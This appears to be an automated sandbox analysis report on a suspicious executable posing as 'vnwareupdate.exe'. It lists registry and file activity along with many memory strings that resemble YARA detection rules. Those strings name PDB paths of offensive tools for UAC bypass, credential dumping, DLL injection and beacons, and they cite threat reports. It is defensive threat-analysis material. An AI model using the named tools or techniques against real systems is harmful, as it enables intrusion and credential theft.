File read: C:\Users\user\Desktop\GZe6EcSTpO.exe

Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: GZe6EcSTpO.exe

Static file information: File size 16770272 > 1048576

Source: C:\Users\user\Desktop\vnwareupdate.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll

Jump to behavior

Source: GZe6EcSTpO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: $x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\exeruner.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\T+M\\Result\\DocPrint.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\RbDoorX64.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\UACElevator_RID2B2C.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\shellcodegenerator.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "\\Gubed\\Release\\Gubed.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\pstgdump_RID2A85.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\Release\\FakeRun.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "c:\\ntevt.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\BypassUAC.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\ASGT.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = /\\Debug\\[a-z]{0,8}katz.pdb/ source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "ntfltmgr.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "\\Debug\\dloader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\AllTheThings_RID2BB8.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "mfc42l00.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\injector.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\svc.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\EWSTEW.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\beacon\\Release\\beacon.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\dloader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\RoyalCli.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\InjectDll.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\Sharpire_RID2A4F.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\milk\\Release\\milk.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\NoPowerShell.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x6 = "\\x86\\Release\\word.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\Release\\Loader.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: BlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cStrider: Cyberespionage group turns eye of Sauron on targets http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauStrider: Cyberespionage group turns eye of Sauron on targets http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sau source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD9Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\Release\\AppInitHook_RID2B57.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\inject.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "bin\\oSaberSvc.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "ipsearcher_RID2B37\\ipsearcher_RID2B37\\Release\\ipsearcher_RID2B37.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\x64\\x64passldr.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDbBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDtBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD-Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDABankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\reflective_dll.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Release\\Myrtille.Services.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\obj\\x86\\Debug\\secure_scan.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\RTLBot.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x7 = "\\obj\\Release\\Potato.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\ClearLog\\Release\\logC.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\Release\\PhantomNet-SSL.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\CWoolger.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\Bot Fresh.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\BypassUacDll.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\Layer.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\kasper.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\amd64\\elrawdsk.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s16 = ".\\lsasrv.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: BlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pd source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\PSAttack.pdb" fullword source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\WindowXarbot.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\custact\\x86\\AICustAct.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\WinMain\\Release\\WinMain.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "Excalibur\\bin\\Shell.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\SkeyMan2.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD dBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDoBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDeBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD9Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDcBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDdBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDTBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDiBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PD8Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDOThe Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/4dec74bc41c581b82459;APTnotes 2014 Operation_Poisoned_Hurricane.pdf source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\ReflectivLoader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\fgexec_RID2983.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x7 = "\\obj\\Release\\botkill.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x6 = "Bot\\Release\\Ism.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\PowerShellRunner.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "Bot5\\Release\\Ism.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/The Maudi Operation (2012) https://raw.githubusercontent.com/lukaszbb/apt-analysis/master/reports_txt/2012/Bankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDBankshot Lazarus Malware https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDh source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\instlsp\\Release\\Lancer.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\scout\\Release\\scout.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = /\\Release\\[a-z]{0,8}katz.pdb/ source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "BypassUac.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s5 = "%windows%\\mfc42l00.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\obj\\Release\\TempRacer_RID2A94.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\exploit.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s0 = "\\i386\\Hello.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
